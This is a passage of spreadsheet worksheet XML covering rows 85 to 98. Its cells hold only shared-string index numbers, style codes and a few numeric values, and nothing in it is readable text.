      <c r="O85" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P85" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q85" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R85" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S85" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T85" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U85" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V85" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W85" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X85" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y85" s="52" t="s">
        <v>737</v>
      </c>
      <c r="Z85" s="52">
        <v>2.0</v>
      </c>
      <c r="AA85" s="52">
        <v>2.0</v>
      </c>
      <c r="AB85" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC85" s="64" t="s">
        <v>205</v>
      </c>
      <c r="AD85" s="65" t="s">
        <v>738</v>
      </c>
      <c r="AE85" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF85" s="53" t="s">
        <v>739</v>
      </c>
      <c r="AG85" s="65" t="s">
        <v>740</v>
      </c>
      <c r="AH85" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI85" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ85" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK85" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL85" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="86" ht="153.75" customHeight="1">
      <c r="B86" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C86" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D86" s="45" t="s">
        <v>730</v>
      </c>
      <c r="E86" s="45" t="s">
        <v>731</v>
      </c>
      <c r="F86" s="55" t="s">
        <v>741</v>
      </c>
      <c r="G86" s="45" t="s">
        <v>742</v>
      </c>
      <c r="H86" s="46" t="s">
        <v>743</v>
      </c>
      <c r="I86" s="46" t="s">
        <v>744</v>
      </c>
      <c r="J86" s="46" t="s">
        <v>745</v>
      </c>
      <c r="K86" s="47">
        <v>1.0</v>
      </c>
      <c r="L86" s="47">
        <v>0.0</v>
      </c>
      <c r="M86" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N86" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O86" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P86" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q86" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R86" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S86" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T86" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U86" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V86" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W86" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X86" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y86" s="52" t="s">
        <v>746</v>
      </c>
      <c r="Z86" s="52">
        <v>3.0</v>
      </c>
      <c r="AA86" s="52">
        <v>40.0</v>
      </c>
      <c r="AB86" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC86" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD86" s="65" t="s">
        <v>747</v>
      </c>
      <c r="AE86" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF86" s="53" t="s">
        <v>748</v>
      </c>
      <c r="AG86" s="65" t="s">
        <v>749</v>
      </c>
      <c r="AH86" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI86" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ86" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK86" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL86" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="87" ht="153.75" customHeight="1">
      <c r="B87" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C87" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D87" s="45" t="s">
        <v>750</v>
      </c>
      <c r="E87" s="45" t="s">
        <v>751</v>
      </c>
      <c r="F87" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G87" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H87" s="46" t="s">
        <v>752</v>
      </c>
      <c r="I87" s="46" t="s">
        <v>753</v>
      </c>
      <c r="J87" s="46" t="s">
        <v>754</v>
      </c>
      <c r="K87" s="47">
        <v>1.0</v>
      </c>
      <c r="L87" s="47">
        <v>0.0</v>
      </c>
      <c r="M87" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N87" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O87" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P87" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q87" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R87" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S87" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T87" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U87" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V87" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W87" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X87" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y87" s="52" t="s">
        <v>755</v>
      </c>
      <c r="Z87" s="52">
        <v>2.0</v>
      </c>
      <c r="AA87" s="52">
        <v>2.0</v>
      </c>
      <c r="AB87" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC87" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD87" s="65" t="s">
        <v>756</v>
      </c>
      <c r="AE87" s="65" t="s">
        <v>757</v>
      </c>
      <c r="AF87" s="53" t="s">
        <v>758</v>
      </c>
      <c r="AG87" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH87" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI87" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ87" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK87" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL87" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="88" ht="153.75" customHeight="1">
      <c r="B88" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C88" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D88" s="45" t="s">
        <v>759</v>
      </c>
      <c r="E88" s="45" t="s">
        <v>760</v>
      </c>
      <c r="F88" s="45" t="s">
        <v>761</v>
      </c>
      <c r="G88" s="45" t="s">
        <v>762</v>
      </c>
      <c r="H88" s="46" t="s">
        <v>763</v>
      </c>
      <c r="I88" s="46" t="s">
        <v>764</v>
      </c>
      <c r="J88" s="46" t="s">
        <v>762</v>
      </c>
      <c r="K88" s="47">
        <v>1.0</v>
      </c>
      <c r="L88" s="47">
        <v>0.0</v>
      </c>
      <c r="M88" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N88" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O88" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P88" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q88" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R88" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S88" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T88" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U88" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V88" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W88" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X88" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y88" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z88" s="52">
        <v>2.0</v>
      </c>
      <c r="AA88" s="52">
        <v>2.0</v>
      </c>
      <c r="AB88" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC88" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD88" s="65" t="s">
        <v>765</v>
      </c>
      <c r="AE88" s="65" t="s">
        <v>766</v>
      </c>
      <c r="AF88" s="53" t="s">
        <v>767</v>
      </c>
      <c r="AG88" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH88" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI88" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ88" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK88" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL88" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="89" ht="153.75" customHeight="1">
      <c r="B89" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C89" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D89" s="45" t="s">
        <v>768</v>
      </c>
      <c r="E89" s="45" t="s">
        <v>769</v>
      </c>
      <c r="F89" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G89" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H89" s="46" t="s">
        <v>770</v>
      </c>
      <c r="I89" s="46" t="s">
        <v>771</v>
      </c>
      <c r="J89" s="46" t="s">
        <v>772</v>
      </c>
      <c r="K89" s="47">
        <v>1.0</v>
      </c>
      <c r="L89" s="47">
        <v>0.0</v>
      </c>
      <c r="M89" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N89" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O89" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P89" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q89" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R89" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S89" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T89" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U89" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V89" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W89" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X89" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y89" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z89" s="52">
        <v>2.0</v>
      </c>
      <c r="AA89" s="52">
        <v>2.0</v>
      </c>
      <c r="AB89" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC89" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD89" s="68" t="s">
        <v>773</v>
      </c>
      <c r="AE89" s="65" t="s">
        <v>774</v>
      </c>
      <c r="AF89" s="53" t="s">
        <v>775</v>
      </c>
      <c r="AG89" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH89" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI89" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ89" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK89" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL89" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="90" ht="153.75" customHeight="1">
      <c r="B90" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C90" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D90" s="45" t="s">
        <v>776</v>
      </c>
      <c r="E90" s="45" t="s">
        <v>777</v>
      </c>
      <c r="F90" s="45" t="s">
        <v>778</v>
      </c>
      <c r="G90" s="45" t="s">
        <v>779</v>
      </c>
      <c r="H90" s="46" t="s">
        <v>780</v>
      </c>
      <c r="I90" s="46" t="s">
        <v>781</v>
      </c>
      <c r="J90" s="46" t="s">
        <v>782</v>
      </c>
      <c r="K90" s="47">
        <v>1.0</v>
      </c>
      <c r="L90" s="47">
        <v>0.0</v>
      </c>
      <c r="M90" s="48" t="s">
        <v>783</v>
      </c>
      <c r="N90" s="48">
        <v>4.0</v>
      </c>
      <c r="O90" s="48">
        <v>20.0</v>
      </c>
      <c r="P90" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q90" s="50" t="s">
        <v>784</v>
      </c>
      <c r="R90" s="50">
        <v>5.0</v>
      </c>
      <c r="S90" s="50">
        <v>25.0</v>
      </c>
      <c r="T90" s="49">
        <v>2100366.0</v>
      </c>
      <c r="U90" s="51" t="s">
        <v>784</v>
      </c>
      <c r="V90" s="51">
        <v>5.0</v>
      </c>
      <c r="W90" s="51">
        <v>45.0</v>
      </c>
      <c r="X90" s="49">
        <v>2100366.0</v>
      </c>
      <c r="Y90" s="52" t="s">
        <v>785</v>
      </c>
      <c r="Z90" s="52">
        <v>9.0</v>
      </c>
      <c r="AA90" s="52">
        <v>63.0</v>
      </c>
      <c r="AB90" s="49" t="s">
        <v>786</v>
      </c>
      <c r="AC90" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD90" s="65" t="s">
        <v>787</v>
      </c>
      <c r="AE90" s="65" t="s">
        <v>788</v>
      </c>
      <c r="AF90" s="53" t="s">
        <v>789</v>
      </c>
      <c r="AG90" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH90" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI90" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ90" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK90" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL90" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="91" ht="153.75" customHeight="1">
      <c r="B91" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C91" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D91" s="45" t="s">
        <v>790</v>
      </c>
      <c r="E91" s="45" t="s">
        <v>791</v>
      </c>
      <c r="F91" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G91" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H91" s="46" t="s">
        <v>792</v>
      </c>
      <c r="I91" s="46" t="s">
        <v>793</v>
      </c>
      <c r="J91" s="46" t="s">
        <v>794</v>
      </c>
      <c r="K91" s="47">
        <v>1.0</v>
      </c>
      <c r="L91" s="47">
        <v>0.0</v>
      </c>
      <c r="M91" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N91" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O91" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P91" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q91" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R91" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S91" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T91" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U91" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V91" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W91" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X91" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y91" s="52" t="s">
        <v>795</v>
      </c>
      <c r="Z91" s="52">
        <v>3.0</v>
      </c>
      <c r="AA91" s="52">
        <v>7.0</v>
      </c>
      <c r="AB91" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC91" s="105" t="s">
        <v>212</v>
      </c>
      <c r="AD91" s="65" t="s">
        <v>796</v>
      </c>
      <c r="AE91" s="65" t="s">
        <v>797</v>
      </c>
      <c r="AF91" s="53" t="s">
        <v>798</v>
      </c>
      <c r="AG91" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH91" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI91" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ91" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK91" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL91" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="92" ht="153.75" customHeight="1">
      <c r="B92" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C92" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D92" s="45" t="s">
        <v>799</v>
      </c>
      <c r="E92" s="45" t="s">
        <v>800</v>
      </c>
      <c r="F92" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G92" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H92" s="46" t="s">
        <v>801</v>
      </c>
      <c r="I92" s="46" t="s">
        <v>802</v>
      </c>
      <c r="J92" s="46" t="s">
        <v>803</v>
      </c>
      <c r="K92" s="47">
        <v>1.0</v>
      </c>
      <c r="L92" s="47">
        <v>0.0</v>
      </c>
      <c r="M92" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N92" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O92" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P92" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q92" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R92" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S92" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T92" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U92" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V92" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W92" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X92" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y92" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z92" s="52">
        <v>2.0</v>
      </c>
      <c r="AA92" s="52">
        <v>2.0</v>
      </c>
      <c r="AB92" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC92" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD92" s="101" t="s">
        <v>804</v>
      </c>
      <c r="AE92" s="65" t="s">
        <v>805</v>
      </c>
      <c r="AF92" s="53" t="s">
        <v>806</v>
      </c>
      <c r="AG92" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH92" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI92" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ92" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK92" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL92" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="93" ht="153.75" customHeight="1">
      <c r="B93" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C93" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D93" s="45" t="s">
        <v>807</v>
      </c>
      <c r="E93" s="45" t="s">
        <v>808</v>
      </c>
      <c r="F93" s="45" t="s">
        <v>809</v>
      </c>
      <c r="G93" s="45" t="s">
        <v>810</v>
      </c>
      <c r="H93" s="46" t="s">
        <v>811</v>
      </c>
      <c r="I93" s="46" t="s">
        <v>812</v>
      </c>
      <c r="J93" s="46" t="s">
        <v>813</v>
      </c>
      <c r="K93" s="47">
        <v>1.0</v>
      </c>
      <c r="L93" s="47">
        <v>0.0</v>
      </c>
      <c r="M93" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N93" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O93" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P93" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q93" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R93" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S93" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T93" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U93" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V93" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W93" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X93" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y93" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z93" s="52">
        <v>2.0</v>
      </c>
      <c r="AA93" s="52">
        <v>4.0</v>
      </c>
      <c r="AB93" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC93" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD93" s="101" t="s">
        <v>804</v>
      </c>
      <c r="AE93" s="65" t="s">
        <v>814</v>
      </c>
      <c r="AF93" s="53" t="s">
        <v>815</v>
      </c>
      <c r="AG93" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH93" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI93" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ93" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK93" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL93" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="94" ht="153.75" customHeight="1">
      <c r="B94" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C94" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D94" s="45" t="s">
        <v>816</v>
      </c>
      <c r="E94" s="45" t="s">
        <v>817</v>
      </c>
      <c r="F94" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G94" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H94" s="46" t="s">
        <v>818</v>
      </c>
      <c r="I94" s="46" t="s">
        <v>819</v>
      </c>
      <c r="J94" s="46" t="s">
        <v>820</v>
      </c>
      <c r="K94" s="47">
        <v>1.0</v>
      </c>
      <c r="L94" s="47">
        <v>0.0</v>
      </c>
      <c r="M94" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N94" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O94" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P94" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q94" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R94" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S94" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T94" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U94" s="60">
        <v>13586.0</v>
      </c>
      <c r="V94" s="51">
        <v>1.0</v>
      </c>
      <c r="W94" s="51">
        <v>1.0</v>
      </c>
      <c r="X94" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y94" s="52" t="s">
        <v>821</v>
      </c>
      <c r="Z94" s="52">
        <v>3.0</v>
      </c>
      <c r="AA94" s="52">
        <v>5.0</v>
      </c>
      <c r="AB94" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC94" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD94" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE94" s="65" t="s">
        <v>822</v>
      </c>
      <c r="AF94" s="53" t="s">
        <v>823</v>
      </c>
      <c r="AG94" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH94" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI94" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ94" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK94" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL94" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="95" ht="153.75" customHeight="1">
      <c r="B95" s="44" t="s">
        <v>244</v>
      </c>
      <c r="C95" s="45" t="s">
        <v>824</v>
      </c>
      <c r="D95" s="45" t="s">
        <v>825</v>
      </c>
      <c r="E95" s="45" t="s">
        <v>826</v>
      </c>
      <c r="F95" s="45" t="s">
        <v>827</v>
      </c>
      <c r="G95" s="45" t="s">
        <v>828</v>
      </c>
      <c r="H95" s="46" t="s">
        <v>829</v>
      </c>
      <c r="I95" s="46" t="s">
        <v>830</v>
      </c>
      <c r="J95" s="46" t="s">
        <v>831</v>
      </c>
      <c r="K95" s="47">
        <v>1.0</v>
      </c>
      <c r="L95" s="47">
        <v>0.0</v>
      </c>
      <c r="M95" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N95" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O95" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P95" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q95" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R95" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S95" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T95" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U95" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V95" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W95" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X95" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y95" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z95" s="52">
        <v>2.0</v>
      </c>
      <c r="AA95" s="52">
        <v>4.0</v>
      </c>
      <c r="AB95" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC95" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD95" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE95" s="65" t="s">
        <v>832</v>
      </c>
      <c r="AF95" s="53" t="s">
        <v>833</v>
      </c>
      <c r="AG95" s="46" t="s">
        <v>834</v>
      </c>
      <c r="AH95" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI95" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ95" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK95" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL95" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="96" ht="153.75" customHeight="1">
      <c r="B96" s="67" t="s">
        <v>284</v>
      </c>
      <c r="C96" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D96" s="45" t="s">
        <v>835</v>
      </c>
      <c r="E96" s="45" t="s">
        <v>836</v>
      </c>
      <c r="F96" s="45" t="s">
        <v>837</v>
      </c>
      <c r="G96" s="45" t="s">
        <v>838</v>
      </c>
      <c r="H96" s="46" t="s">
        <v>839</v>
      </c>
      <c r="I96" s="46" t="s">
        <v>492</v>
      </c>
      <c r="J96" s="46" t="s">
        <v>840</v>
      </c>
      <c r="K96" s="47">
        <v>1.0</v>
      </c>
      <c r="L96" s="47">
        <v>0.0</v>
      </c>
      <c r="M96" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N96" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O96" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P96" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q96" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R96" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S96" s="50"/>
      <c r="T96" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U96" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V96" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W96" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X96" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y96" s="52">
        <v>2051116.0</v>
      </c>
      <c r="Z96" s="52">
        <v>1.0</v>
      </c>
      <c r="AA96" s="52">
        <v>1.0</v>
      </c>
      <c r="AB96" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC96" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD96" s="65" t="s">
        <v>841</v>
      </c>
      <c r="AE96" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF96" s="53" t="s">
        <v>842</v>
      </c>
      <c r="AG96" s="65" t="s">
        <v>843</v>
      </c>
      <c r="AH96" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI96" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ96" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK96" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL96" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="97" ht="153.75" customHeight="1">
      <c r="B97" s="67" t="s">
        <v>284</v>
      </c>
      <c r="C97" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D97" s="45" t="s">
        <v>844</v>
      </c>
      <c r="E97" s="45" t="s">
        <v>845</v>
      </c>
      <c r="F97" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G97" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H97" s="46" t="s">
        <v>846</v>
      </c>
      <c r="I97" s="46" t="s">
        <v>847</v>
      </c>
      <c r="J97" s="46" t="s">
        <v>848</v>
      </c>
      <c r="K97" s="47">
        <v>1.0</v>
      </c>
      <c r="L97" s="47">
        <v>0.0</v>
      </c>
      <c r="M97" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N97" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O97" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P97" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q97" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R97" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S97" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T97" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U97" s="51" t="s">
        <v>849</v>
      </c>
      <c r="V97" s="51">
        <v>2.0</v>
      </c>
      <c r="W97" s="51">
        <v>5.0</v>
      </c>
      <c r="X97" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y97" s="52" t="s">
        <v>850</v>
      </c>
      <c r="Z97" s="52">
        <v>6.0</v>
      </c>
      <c r="AA97" s="106">
        <v>13.0</v>
      </c>
      <c r="AB97" s="107" t="s">
        <v>82</v>
      </c>
      <c r="AC97" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD97" s="65" t="s">
        <v>851</v>
      </c>
      <c r="AE97" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF97" s="53" t="s">
        <v>852</v>
      </c>
      <c r="AG97" s="65" t="s">
        <v>853</v>
      </c>
      <c r="AH97" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI97" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ97" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK97" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL97" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="98" ht="153.75" customHeight="1">
      <c r="B98" s="67" t="s">
        <v>284</v>
      </c>
      <c r="C98" s="45" t="s">
